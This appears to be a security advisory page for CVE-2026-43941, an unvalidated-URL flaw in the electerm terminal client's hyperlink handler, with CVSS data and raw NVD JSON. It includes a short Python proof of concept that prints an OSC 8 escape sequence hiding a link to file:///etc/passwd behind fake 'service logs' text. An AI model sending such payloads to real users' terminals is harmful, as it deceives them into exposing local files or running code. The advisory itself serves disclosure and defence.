Security Vulnerability Report
CVE-2026-43941 CVSS 9.6 CRITICAL

CVE-2026-43941

Published: 2026-05-08 04:16:23
Last Modified: 2026-05-08 19:17:31

Description

electerm is an open-source terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In versions 3.8.15 and prior, Electerm's terminal hyperlink handler passes any URL clicked in the terminal directly to shell.openExternal without any protocol validation. An attacker who controls terminal output (e.g., via a malicious SSH server, a compromised remote host, or a malicious plugin rendering terminal content) can thus achieve arbitrary code execution or local file access on the victim's machine, requiring only that the victim clicks a displayed link. At time of publication, there are no publicly available patches.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:electerm_project:electerm:*:*:*:*:*:*:*:* - VULNERABLE
electerm <= 3.8.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC for CVE-2026-43941.
# This script generates terminal output containing a malicious hyperlink.
# If a user clicks this link in a vulnerable Electerm version, the client
# hands the URL to shell.openExternal, which opens the local password file.
malicious_url = "file:///etc/passwd"

# OSC 8 escape sequence for terminal hyperlinks.
# Format: \033]8;;URL\033\\Text\033]8;;\033\\
payload = f"\033]8;;{malicious_url}\033\\[SYSTEM] Click here to view service logs\033]8;;\033\\"

print("Malicious output to be sent to terminal:")
print(payload)
print("\nIf clicked, Electerm will execute: shell.openExternal('file:///etc/passwd')")
```

References

https://github.com/electerm/electerm/security/advisories/GHSA-fwf6-j56g-m97c (Vendor Advisory, Mitigation)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-43941",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T04:16:23.260",
    "lastModified": "2026-05-08T19:17:30.757",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In versions 3.8.15 and prior, Electerm's terminal hyperlink handler passes any URL clicked in the terminal directly to shell.openExternal without any protocol validation. An attacker who controls terminal output (e.g., via a malicious SSH server, compromised remote host, or malicious plugin rendering terminal content) can thus achieve arbitrary code execution or local file access on the victim's machine, requiring only that the victim clicks a displayed link. At time of publication, there are no publicly available patches."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-88"},
          {"lang": "en", "value": "CWE-601"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:electerm_project:electerm:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "3.8.15",
                "matchCriteriaId": "F236D6E0-CA4E-4FDB-AC8A-4AA1314FE5A7"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/electerm/electerm/security/advisories/GHSA-fwf6-j56g-m97c",
        "source": "[email protected]",
        "tags": ["Vendor Advisory", "Mitigation"]
      }
    ]
  }
}
```